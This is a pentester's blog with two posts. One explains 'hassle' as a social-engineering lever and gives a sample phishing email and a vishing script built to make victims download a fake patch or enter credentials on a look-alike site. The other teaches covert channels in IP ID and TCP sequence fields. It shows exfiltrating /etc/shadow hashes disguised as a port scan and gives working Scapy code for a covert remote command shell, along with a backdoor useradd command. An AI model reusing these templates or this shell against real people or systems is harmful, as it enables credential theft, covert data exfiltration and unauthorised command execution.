Category: Χωρίς κατηγορία

The Hassle Exploit

The catching up (troubles of my mere existence)

It’s been a long time again. I can say from the WordPress Editor UI, that has had some changes (it’s totally not recognizable). Things have changed in many ways, but I’m still Penetration Testing for food (and accommodation sometimes). I also bought a wok (that’s totally irrelevant).

As I said, I’m still Penetration Testing. Mostly big companies. I try to secure their money and assets, so people that want them won’t get them. I arguably am like Peter Pan’s villain – I’m securing rich people’s stuff, so poor people won’t get them without paying, having sex with them (that’s not the majority of my projects) or allowing a permission in their Android phones

So, I have this controversial job, most of the time, probably the same with my readers (at least during the day). We could be considered “Captain Hooks” of some sort. I’ll let my psychologist know about my identity crisis. Or my mom.

The subject looks like it needs a post of its own, so moving on…

The Warmup

So yeah, I pentest a lot, it’s a job and I am pleased doing it. The thing that gives me the  most chills is Red Teaming.

Oh boy, Red Teaming is the real thing. Attack simulation and such, from physically opening a door, to phishing and vishing, to NTLM relaying, to DAing a Domain (or a bunch o’ them), to displaying dickpics in all ATMs of the country before dispensing money. I mostly skip the last part (or flash them for a brief second – like Tyler Durden’s appearances).

But my favorite part is phishing. I love people, in a philosophical sense. I love them with their defects (as a race), with their ambitions and fears. That’s what made me come up to here (not sure if it’s considered “up” anyway), and that’s what motivates me in life. Looking for ways to fool them really got me from the beginning. I’m one of them (us?) myself, and that helps a lot, too.

 

The Real Topic of the Post

By now, I’m not sure what I really am gonna write below. I was planning to introduce you to the Wormnest tool. Something I made to serve payloads with style, but that’s gonna be technical (you know HTTP headers, Python Development, Reverse Proxies and TLS certs), so I’m leaving it for some other time. *Fixing the title*. So, let’s continue with our next guest:

 

Hassle in Social Engineering

Most social engineering projects start with setting up a Mail Server. And setting up a Mail Server is a hassle. I don’t like hassles. Fuck hassles (Taxes are a hassle – Fuck taxes). Plus, when you set everything up (it’s not that difficult, it’s just a hassle), you will still be Greylisted anyways in most cases, that shows how badly designed the Mailing Protocol is (for 2018), etc-etc.

Setting up a phone number is not that bad anyway. You just buy it, or get your company to buy it. And background checking a telephone number is so much more hassle than checking an SMTP server… It is 1000 times more difficult to get a mobile phone number blacklisted than an SMTP server. And re-deployment is as easy as “buy another number”. And the cost is less.

Actually, its all about avoiding hassle. And in a totally different meaning. The “hassle” is an exploit to Human Psychology. And it’s obvious when you think of it.

Hassling as an Exploit

Well, you know how your country’s law enforcement system works. Right? Exactly, you have no clue. What about the tax system? Yep, thought so. And, of course you know the Terms and Conditions of Gmail. I mean you are using it all the time. Well, that’s a “No“, right. Then you have been exploited (like most of us).

Hassle is a bad thing. Creates bad feelings in a lingering way. The feelings create an experience, and the experience breaks into our behavior (from time to time).

We all avoid hassle, as this experience has formed our behavior into avoiding it. So, the exploit lies into putting hassle in things that you want people to avoid. That’s an old one. But a golden one.

The Bible’s “Have faith and doubt not” is just the payload (do you remember the color notation it’s gonna come in handy here). The exploit for that is hassle.

Hassling vs Troubling

Well, hassle and trouble are very different. SO VERY DIFFERENT. And the difference lies in the below example:

Example to show the difference between hassle and trouble:

There are 2 countries, with the following rules for murder with intention:

Country 1: A Murderer will go to jail for 15 years.

Country 2: A Murderer will have to sign a form based on Law 2142/2014, and then provide it to local authorities. After that, he/she is going to receive the form based on Law 3354/2011 by postal service, complete and sign it, along with 3 of his/hers victim’s blood family members and provide this form to the ministry of Law Enforcement. After receiving Law Enforcement final report on the case, and providing it to local authorities, he/she is free of charges.
Ones that not comply will go to jail for 20 years.

In the second country, add the fact that the Ministry of Law Enforcement is open only 10:00 to 13:00 all weekdays except Mondays, and that the one accountant that handles such cases is on vacation in Bahamas for an indefinite period of time.

I don’t know about you but I’d prefer to live in Country 1. Not because I like jailing laws, but because it is clear that if you perform murder, to stay free, you have to escape. Not complete written forms, that none informs you were to find (and it’s probably fruitless to ask the Murder Community here…), and wait in queues.

In the bottom line: in the first country if you are a murderer you are in trouble. In the second country you are in hassle.

Defying the Laws of Tradition

Fighting against trouble, is always easier than fighting against hassle. The second one takes more courage in the long run. There is no real enemy in there, so you have nothing clear to fear, yet you feel disappointed, as the things you are trying to achieve never really get fulfilled. Yet, nothing virtually is there to prevent you. Hence, it’s easier to surrender when putting a fight against hassle, with the illusion that you could achieve the goal given more time/patience/etc.

The only won fight against hassle, that I’m aware of, is in Margaritaville (a South Park episode).

Hassle in Phishing

This exploit doesn’t need any serious setup (nowhere near a valid SMTP server). It is easy to pull off. You just have to introduce someone into a hassle-inducing situation. And then carefully place your payload in a shortcut/gateway you provide. It’s as simple as that. Most installers do it that way:

 

  • Customize before installation (for advanced users)
    (Too much hassle, to find the correct settings)
  • Express Install (hassle free!)
    (Installs Google Chrome and other rootkits along with the main software)

So, a Mail Social Engineering Scenario could be the following:

From: Outlook Security <outlook@example.com>
To: Victimious John <victim@example.com>

Outlook Security Notice – 12/10/2018

It is identified by Microsoft Windows Defender that your host is running a PUP, posing danger in the host’s network. It is highly recommended to inform your IT Administrator, showing this email and the mail threads received by that host the last 7 days.

To fix the issue yourself, please download the remediation patch available by Microsoft at https://microsoft-malware/KB-19660 ¹.

Thank You
The Outlook Security Team

[1]: Create URLs like this automatically using Wormnest (shameless plug)!

Breakdown of the victim’s psychological aspect

Outlook Security Notice – 12/10/2018

It has a date, and no “Dear X,” it must be formal and serious.

It is identified by Microsoft Windows Defender that your host is running a PUP, posing danger in the host’s network.

Defender is an Antivirus, it probably knows more about my computer than me (spoiler alert: it does). I don’t know what a PUP is, but googling it is too much of a hassle.

It is highly recommended to inform your IT Administrator,

This creep that sweats and swears in every situation that includes computers? Oh, well…

showing this email and the mail threads received by that host the last 7 days

He’s gonna get mad at me when he sees that I use the corporate email in buying shaving stuff in shop.workingmother.com with discount (well, I googled “working mother shop” and it existed).

To fix the issue yourself,

Yeeeeees?

please download the remediation patch available by Microsoft at https://microsoft-malware/KB-19660

I’m so eager to eat whatever this link brings in my computer

Thank You
The Outlook Security Team

I thank you “Outlook Security Team“, have a nice day!

Bonus points:

Actually mentioning the IT Administrator gets points in the non-phishing direction…

 

Hassle in Vishing (The something-wrong-with-your-mail Scenario)

– Hello is that John Victimious

– Yes, it’s me. Who is calling?

– My name is John Smith (who else?). I’m calling on behalf of your corporate mail provider.

– Google?

– Yes, Google Corporation <Receivers Country name here>.

– Oh, is there something wrong?

– Well, not exactly. Can you please login to a page and give me what you see?

– I’m a bit busy now, can I sent you an email when I manage?

– You can’t send me an email, you have to call at <phone number>, ask for email verification support, wait 8-9 minutes as it is the mean waiting time, then describe the situation and wait for someone to handle the case. Plus, it has to be done today, because it’s probable that you’ll have trouble logging into your email tomorrow.

– Oh, never mind. What is the website?

– It is google.yolose.com. Y, O, L, O, S, E.

– Ok, I’m in. Do I just login here and tell you what I get?

– Exactly!

– OK, gimme a sec. *types the creds* hmm… Yes. I see a green tick, saying that “The account has been verified against <TargetCompany>

– Great! You’re set! Thank you for your time!

See? Just introducing some hassle will bend most defenses. Plus…

Hassle is a recognized attribute of dealing with Authorities

One of the reasons we really get overwhelmed with hassle situations, is because we have met hassle in the past and had a negative experience, as said before. But, hassle in our lives has been introduced in a quite specific way. And that’s when Dealing with Authorities. The paperwork in most countries is so staggering that creates hassle for even the simplest of tasks.

That’s another good reason to use hassle in your Social Engineering. You give the impression of authority, even without being yourself aware of that!

 

Final Thoughts

Really Generic/Philosophical…

It’s not humanity that sucks, it’s its systems. It became (humanity) so big, so fast, that people didn’t have the time to develop really sane ways of co-existing (in groups of more than 150 in the same community e.g: cities). That’s where ideology and common ideas come into play, to unite the 150+ people that are forced to live so close together.

But, as all projects with tight deadlines, communities are full of bugs. And some become security vulnerabilities. And people end up being massively exploited as they carry their common (vulnerable) traits.

The Hassle Vulnerability is not a new one. It is being exploited by lawyers and tax makers for years now. But to patch it, a new community needs to be build. A community that won’t be so obviously based on it

 

Advertisements

Teaching an Old Dog (not that new) Tricks. Stego in TCP/IP made easy (part-1)

With “Old Dog” being the TCP/IP protocol stack, and “(not that new) Tricks” being steganography and generally covert channels you can see where this is going…

I know those things aren’t new. Just google “Covert TCP“! They are old as dust (there is even a PoC implementation in C), proven to be working, but for some reason, I don’t see them being applied in pentest projects a lot. Maybe because of their greyish ways and lack of versatile implementation.

Yet, the simplicity of the idea is tempting. We could leak a lot of data using not strictly defined protocol header values. The tools are here (gonna prove it in a second), and the Oh Captain, my Captain has already written the Bible on Networking.

 

3, 2, 1, Nose Dive…

The IP identification field

The Almighty IPv4 header!
    0                   1                   2                   3
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |Version|  IHL  |Type of Service|          Total Length         |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |         Identification        |Flags|      Fragment Offset    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Time to Live |    Protocol   |         Header Checksum       |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                       Source Address                          |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Destination Address                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

And the RFCDefinition” on “Identification” Field:

  Identification:  16 bits

    An identifying value assigned by the sender to aid in assembling the
    fragments of a datagram.

That’s all. A value that is useful if there is packet fragmentation. If not it just lies there meaningless. The definition could end up with: “Just don’t use the same values all over folks

So IP implementations used the +1 technique. Every new packet leaving a machine would have the ID of the previous packet plus one.

And then this happened! The nmap Idle Scan exploited (more like used) this implementation idea, to produce port scans that were really hard to track. How this can happen is an interesting read. It is a satanic idea, from a notorious networking master.

Implementations changed their ways and started using random values in the IP identification field. This is our chance now!

Random values. The place to start!

If we know that we expect random values in a certain field, we can’t perform any checks in it… Everything is permitted.

For example: The IP identification bytes are “FU” in a packet. Or “GG”, or 2 zero bytes (\x00). We can blame none. It just happened out of luck… This is our starting point!

(Actually there is a catch on this, called entropy. Life is not that easy. More on this on part 2, where we climb this fence too)

Let’s do some hands on! (Scapy and heavy Python is being used, fasten your seatbelts):

Screenshot from 2016-09-12 23-00-01.png
Sender(left) – Receiver(right)

Here we pass the payload “Hello!” (6 bytes) across from sender to receiver by encapsulating it in 3 IP packets’ identification fields (2 bytes each).

The receiver reassembles the identification fields of the packets and recreates the string.

Pretty impressive! And pretty basic. But quite untraceable too. I mean those are the hexdumps of the packets:

screenshot-from-2016-09-12-23-09-52

If you look closely you can see the “Hello!” bytes, in each packet, in Big Endian (as bytes travel in Big Endian through networks). They are visible and detectable, but none is gonna search for data leakage in the packet’s header. Those packets could be bogus HTTP requests to totally misdirect the analyst.

The problem:

$ ls -l /etc/shadow
-rw-r----- 1 root shadow 1956 Aug  2 16:27 /etc/shadow

That’s a file deserving to be leaked. But this size will produce 978 packets, assuming we encapsulate data only in the IP identification field… The keyword here is only

 

In search for moar Bandwidth…

Looking for more fields the Protocol Definitions do not totally define, or define as random, the ISN is a candidate. TCP that is.

    0                   1                   2                   3   
    0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |          Source Port          |       Destination Port        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                        Sequence Number                        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Acknowledgment Number                      |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |  Data |           |U|A|P|R|S|F|                               |
   | Offset| Reserved  |R|C|S|S|Y|I|            Window             |
   |       |           |G|K|H|T|N|N|                               |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |           Checksum            |         Urgent Pointer        |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                    Options                    |    Padding    |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
   |                             data                              |
   +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

The Initial Sequence Number has to be not exactly random, but highly variant for every new connection made (RFC 793, p 27 – here).

To make a long story short, the sequence number field counts how many bytes have been delivered in an A->B connection. But if all connections started with Initials Sequence Number of 0 (as no bytes have traveled through yet), this value would be easy to guess by evil-doers. Guessing this value makes you able to inject packets to an A->B connection altering what is being communicated. Altering an .exe file download from an FTP or web page for example. Scary stuff.

So ISN has been defined to be hard(er) to guess in RFC using a timed algorithm. For us, it is safe to say that ISN is effectively random. And the game begins…

4 more bytes?

Kind of… But with caution. In a TCP connection the sequence numbers aren’t random. Far from it. They count the bytes delivered each way of the connection. The randomness lies to what the first (Initial) Sequence Number will be. So we can have 4 more bytes of “bandwidth” in connection attempts. That is only for the first packet of every potential connection. Successful or Failed. And a place where those packets are being delivered like crazy: Port Scans

So we can make a PC (we have deeply compromised) do a “Port Scan” to us. It will walk like a Port Scan, talk like Port Scan but it will be an exfiltration. A bad one.

Hands on:

Oh, before that, I will use this line in my code:

grep -v '#' /usr/share/nmap/nmap-services | sort -r -k3 | awk  '{print $2}' | cut -d/ -f1 | head -$x

I generally like Bash Kung Fu. This particular line is useful to get the X most common ports from the nmap port usage frequency file. The one it uses with the –top-ports option. We are gonna simulate an nmap port scan… Here we are: Screenshot from 2016-09-14 15-20-51.png

What was leaked here? A password hash! Let’s fire up John The Ripper! And it took just 17 packets.

The .pcap file with the actual packets can be found here. Wireshark friendly and all. Try analyzing it yourself to get the payload with your own methods.

(Also happy to see that scapy has default source port of 20/ftp-data, which, as of SANS504 course, is the most intrusive port for Port Scanning. Wisely made…)

 

The Complete Change of Mind

Exfiltration is LAME…

I mean, come on… To run scapy on a machine you have to root it. Either for crafting packets, or using 2-layer sniffing. So if you have already rooted a machine you need the most of it. Getting its data is just a small aspect of all the power you have. You need Remote Command Execution. You need the # Shell god-dammit.

But shells (bind/reverse/web) are visible and highly detectable. And they lack style altogether! Let’s make a Covert Shell to conclude part-1.

Advantages:

  • Absolutely connection-less, thous ultimately stealthy in the OS 4-layer sockets.
  • IDS/IPS won’t catch it as they don’t look in packet headers.
  • No useful info will be logged by Firewalls and security devices in the perimeter. Everything will resemble a Port Scan in the eye of the analyst who doesn’t have access to packet capture.

Disadvantages:

  • Won’t work through proxies (any kind), as they rebuild all packets from scratch.
  • It needs a program to run on the victim.
  • It generally lacks response from commands (the version shown here).

 

The concept:

We want to run a simple command like:

useradd -p $(openssl passwd -1 covert_password) covert_user

to create a user with password in the remote machine.

The command has to travel covertly to the machine to be executed.

This command has to be chunked to fit in a number of packets. We have to create also a switch, to inform the Listener which is the last packet, as different commands have different lengths.

So we sacrifice a byte from the 6 available bandwidth bytes of a packet to make it a switch.

There is also the idea of padding. If the length of the command divided by 5 (the new bandwidth of a single packet) has a remainder, that means that the last packet will need extra bytes to be filled up. Those bytes are called padding and need to be easily removed or ignored.

 

The (scapy) code

The Listener Code

from os import system
from struct import pack

payload = ''
while True :
    packet = sniff (iface = 'lo', count = 1) [0]
    packet_payload = ''.join( pack("<HI", packet.id, packet.seq) )
    payload += packet_payload[1:]
    if packet_payload[0] == '\xff' :
        continue
    if packet_payload[0] == '\xdd' :
        os.system(payload.replace('\x00', ''))
        print "Run command '%s'" % payload
        payload = ''

Waiting for something longer, aren’t you? So in Python this is 14 lines. Let’s try in English:

In an infinite loop we
fetch the first packet we see and
reassemble the string that has been split in the ID and Sequence Number Fields
We add that string to the payload.
If we see the byte \xff we are fine and continue    # this line is added as a handle for additional functionality
If we see the byte \xdd it means that the packet we got was the last of a command.
We run the command to the shell with system()
Announce our task to make the beta tester happy.
Empty the payload string to make it ready for the next command.
Repeat from the begining

10 lines. And English doesn’t need includes and imports.

The Sender Code

from struct import unpack

def chunker(payload, chunk_size = 5) :
    packetN = (len(payload) / chunk_size)
    if len(payload) % chunk_size > 0 :
        packetN + 1
    payload += '\x00' * ( chunk_size - (len(payload) % chunk_size) )
    packets = []
    payload_chuncks = [payload[x:x + chunk_size] for x in xrange(0, len( payload ), chunk_size) ]
    for i in range( len(payload_chuncks) - 1) :
        ip_id, tcp_isn = unpack("<HI", '\xff' + payload_chuncks[i])
        packet = IP( id = ip_id )/TCP( seq = tcp_isn )
        packets.append( packet )
    ip_id, tcp_isn = unpack("<HI", '\xdd' + payload_chuncks[-1])
    packet = IP( id = ip_id )/TCP( seq = tcp_isn )
    packets.append( packet )
    return packets

while True :
    payload = raw_input("$> ")
    if not payload :
        continue
    packets = chunker(payload)
    send(packets, inter = 0.05)

And this is the Sender. As you can see the code works only for localhost and has a lot of limitations. I have been writing a Proof of Concept of a Covert Shell. The full blown one will come in the Part-2

It’s Alive, it’s alive…

Screenshot from 2016-09-14 20-36-55.png
Sender(Left), Receiver(Up-Right), Proof that the Command has been Executed (Down-Right)

 

The mighty Analyst’s sideScreenshot from 2016-09-14 20-51-28.png

Hmm… The ID and Sequence number are clearly not random on all the packets from this host… I wonder what is going on here…

To Be Continued…